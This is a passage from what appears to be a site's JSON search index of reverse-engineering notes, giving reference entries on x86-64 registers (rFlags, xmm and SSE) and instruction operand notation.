Mode VM 17 31-63 Reserved.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Flag Register rFlags","id":"343","title":"The Flag Register rFlags"},"344":{"body":"In addition to the aforementioned registers, the x86-64 paradigm includes 16 registers, xmm[0-15], which are used for 32- and 64-bit floating-point operations. Furthermore, the same registers are used to support the Streaming SIMD Extensions (SSE) which allow for the execution of Single Instruction Multiple Data (SIMD) instructions.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Floating-Point Registers and SSE","id":"344","title":"Floating-Point Registers and SSE"},"345":{"body":"The x86-64 assembly paradigm has quite a lot of different instructions available at its disposal. An instructions consists of an operation and a set of operands where the latter specify the data and the former specifies what is to be done to that data.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Instruction Set » Introduction","id":"345","title":"Introduction"},"346":{"body":"Typically, instruction signatures are represented using the following operand notation. Operand Notation Description Register operand. , , , Register operand with a specific size requirement. Source operand. Destination operand - this may be a register or memory location. Floating-point destination register operand. Immediate value (a literal). Base-10 by default, but can be preceded with 0x to make it hexadecimal. Memory location - a variable name or an address. Arbitrary operand - immediate value, register or memory location.